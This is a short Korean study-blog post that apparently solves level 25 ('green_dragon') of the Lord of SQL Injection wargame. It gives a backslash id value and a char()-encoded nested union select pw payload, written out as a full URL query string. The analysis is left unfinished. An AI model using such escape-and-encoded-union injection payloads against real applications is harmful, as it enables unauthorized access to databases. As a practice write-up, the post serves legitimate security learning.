[Lord of SQL Injection] 25번 green_dragon 풀이

* 개인적인 공부 내용을 기록한 글입니다.

---

이전 문제

https://choco4study.tistory.com/115

[Lord of SQL Injection] 24번 evil_wizard 풀이

---

25번 문제 green_dragon 분석 및 풀이

 

 

25번 문제는 다음과 같다.

 

 

딱 봐도 뭐가 많다.

이런 문제는 기본 한두시간 이상 걸리게 되는 것 같다...

어떻게 결국 풀긴 했는데 너무 졸려서 분석은 내일 마저 추가한다.

 

[1] id 페이로드

⇒ \

 

[2] pw 페이로드

⇒ union select char(92), char(117,110,105,111,110,32,115,101,108,101,99,116,32,99,104,97,114,40,57,55,44,49,48,48,44,49,48,57,44,49,48,53,44,49,49,48,41,32,35) %23

 

따라서, ?id=\&pw=union select char(92), char(117,110,105,111,110,32,115,101,108,101,99,116,32,99,104,97,114,40,57,55,44,49,48,48,44,49,48,57,44,49,48,53,44,49,49,48,41,32,35) %23 을 url 뒤에 붙여준다...ㅎ (겁나 길다)

 

답을 넣어보면,

 

 

25번 문제가 풀린다.